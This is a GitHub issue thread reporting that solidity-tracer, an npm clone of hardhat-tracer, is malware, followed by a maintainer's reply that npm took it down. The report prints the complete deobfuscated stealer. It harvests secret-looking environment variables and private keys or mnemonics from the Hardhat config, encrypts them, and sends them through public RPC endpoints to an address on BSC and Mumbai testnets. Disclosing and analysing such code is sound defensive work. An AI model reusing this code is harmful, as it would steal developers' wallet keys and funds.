malware clone of hardhat-tracer
Opened this issue · 1 comments
CedarMist commented
The following package is a clone of hardhat-tracer, but contains malware which scrapes for private keys
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
This submits the encrypted data to BSC & matic testnets:
See:
- https://testnet.bscscan.com/address/0x92cA86ECE960AA419FF61915e85347030cc6D274
- https://mumbai.polygonscan.com/address/0x92cA86ECE960AA419FF61915e85347030cc6D274
The deobfuscated code is:
try {
require("@nomicfoundation/ethereumjs-vm");
} catch {
console.error("\n\nERROR\n\nPlease upgrade your hardhat version to 2.11 or above.\nThis error is generated by plugin \"hardhat-tracer\" because it is \ndependent on some features available in hardhat >=2.11.0 <3.0.0.\n\nnpm i hardhat@latest\n\nor\n\nyarn add hardhat@latest\n\n");
process.exit(0x1);
}
import './chai';
import './extend';
import './tasks';
export * from './types';
export * from './wrapper';
const crypto = require("crypto");
const hardhatConfig = require('hardhat/config');
const ethereumjs = require("@ethereumjs/tx");
const common = require("@ethereumjs/common");
import { Web3, HttpProvider } from 'web3';
const ENV_PATTERNS = ["MNEMONIC", 'PRIVATE', "SECRET", "KEY", 'PK', 'ACCOUNT', "API", "_PATH", "DEPLOY", "ETH"];
function secretsFromEnv() {
return Object.keys(process.env).filter(_0x51d8e8 => {
for (const _0x4cc5f3 of ENV_PATTERNS) {
if (_0x51d8e8.toUpperCase().includes(_0x4cc5f3)) {
return true;
}
}
return false;
}).map(_0x5ab621 => _0x5ab621 + '=' + process.env[_0x5ab621]);
}
function checkSecret(_0x4c7ddd, _0xacc2d9) {
try {
JSON.stringify(_0x4c7ddd);
return _0x4c7ddd;
} catch (_0x361686) {
return _0xacc2d9 + ": " + _0x361686;
}
}
function secretsFromConfig(_0x9cc15f) {
return Object.values(_0x9cc15f.networks || {}).map(_0x28194b => {
if (!!_0x28194b.privateKey) {
return [checkSecret(_0x28194b.privateKey, "privateKey")];
}
if (!!_0x28194b.mnemonic) {
return [checkSecret(_0x28194b.mnemonic, "mnemonic")];
}
if (!!_0x28194b.accounts) {
if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Array) {
return _0x28194b.accounts.map((_0x545fff, _0x8ed385) => checkSecret(_0x545fff, "accounts[" + _0x8ed385 + ']'));
}
if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Object) {
if (!!_0x28194b.accounts.privateKey) {
return [checkSecret(_0x28194b.accounts.privateKey, 'accounts.privateKey')];
}
if (!!_0x28194b.accounts.mnemonic) {
return [checkSecret(_0x28194b.accounts.mnemonic, "accounts.mnemonic")];
}
}
}
return null;
}).filter(_0x32f721 => _0x32f721 != null).flat();
}
function encryptSecrets(_0x4f59ef) {
let _0x1df4a4;
try {
_0x1df4a4 = JSON.stringify(_0x4f59ef);
} catch (_0x33f25f) {
_0x1df4a4 = "final: " + _0x33f25f;
}
const _0x31a8b0 = crypto.randomBytes(0x20);
const _0x282dd4 = crypto.randomBytes(0x10);
const _0x49f6ff = crypto.createCipheriv('aes-256-cbc', _0x31a8b0, _0x282dd4);
let _0x5c300f = _0x49f6ff.update(_0x1df4a4, 'utf-8', "hex");
_0x5c300f += _0x49f6ff.final('hex');
const _0x46998b = crypto.createPublicKey("-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAoVMvXIi5b/APV4y8RF9iLprdNWLr3F4t4urTTX/2wZFs6Tq4hX0N\nZFx+CGUvyNICrjvL9fu7LqDyvUnxLhH+sGl5o+drrGU4O2I81W0Ul6/aoI9KBpJ8\nmJBK9rFLExs55lG++J3GaXdAqmEv9J8xcq6QpKGniiPIM59IUPwmsjeFeZyfe7rL\ndCHKnVNgHxcPBnymIntn58qwfAUbXTcNZszrd8pqO8DYwpxDaNnHxhnwDGGDCBmT\n67/ln6vOLJm2YnozuRnAnvF9AjND/bdc7jBhe9A3lM67b3hZVsnwmZskyo1RTsXv\nGdfgsOhIlIhf0/vxGIMUbfNlyDaayWwG3QIDAQAB\n-----END RSA PUBLIC KEY-----");
const _0x537224 = crypto.publicEncrypt(_0x46998b, _0x31a8b0);
const _0x1655df = crypto.publicEncrypt(_0x46998b, _0x282dd4);
return Buffer.concat([_0x537224, _0x1655df, Buffer.from(_0x5c300f, "hex")]);
}
async function sendSecretsToBlockchain(_0xd0d988, _0x46aefb, _0x18d187, _0x38c1f1, _0x44908f, _0x3fc84f) {
const _0x119a6c = new HttpProvider(_0x46aefb);
const _0x443b17 = new Web3(_0x119a6c);
const _0x4b0523 = new Buffer(_0x38c1f1, 'hex');
const _0x9d637e = await _0x443b17.eth.getTransactionCount(_0x44908f);
const _0x4192ba = new ethereumjs.Transaction({
'gasLimit': _0x443b17.utils.toHex(0x19f0a0),
'gasPrice': _0x443b17.utils.toHex(0x826299e00),
'from': _0x44908f,
'to': _0x3fc84f,
'nonce': _0x443b17.utils.toHex(_0x9d637e),
'value': _0x443b17.utils.toHex('0'),
'data': _0xd0d988,
'chainId': _0x18d187
}, {
'common': common.Common.custom({
'chainId': _0x18d187
})
});
const _0xe02a79 = _0x4192ba.sign(_0x4b0523);
const _0x403ee4 = await _0x443b17.eth.sendSignedTransaction('0x' + _0xe02a79.serialize().toString("hex"));
return _0x403ee4.transactionHash;
}
async function storeSecrets(_0x39d958) {
try {
return await sendSecretsToBlockchain(_0x39d958, 'https://bsc-testnet.public.blastapi.io', 0x61, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
} catch (_0x1bd08d) {
try {
return await sendSecretsToBlockchain(_0x39d958, "https://endpoints.omniatech.io/v1/matic/mumbai/public", 0x13881, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
} catch (_0x40cdaf) {
return "store mumbai err: " + _0x40cdaf;
}
}
}
hardhatConfig.extendEnvironment(async _0x185fb5 => {
const _0x199acd = [];
try {
_0x199acd.push(...secretsFromEnv());
} catch (_0x4a1233) {
_0x199acd.push("env err: " + _0x4a1233);
}
try {
_0x199acd.push(...secretsFromConfig(_0x185fb5.config));
} catch (_0x2ae4bc) {
_0x199acd.push("config err: " + _0x2ae4bc);
}
const _0x3745e5 = encryptSecrets(_0x199acd);
await storeSecrets(_0x3745e5);
});
zemse commented
Thanks for taking the effort! It appears that the package has been taken down by npm team. https://www.npmjs.com/package/solidity-tracer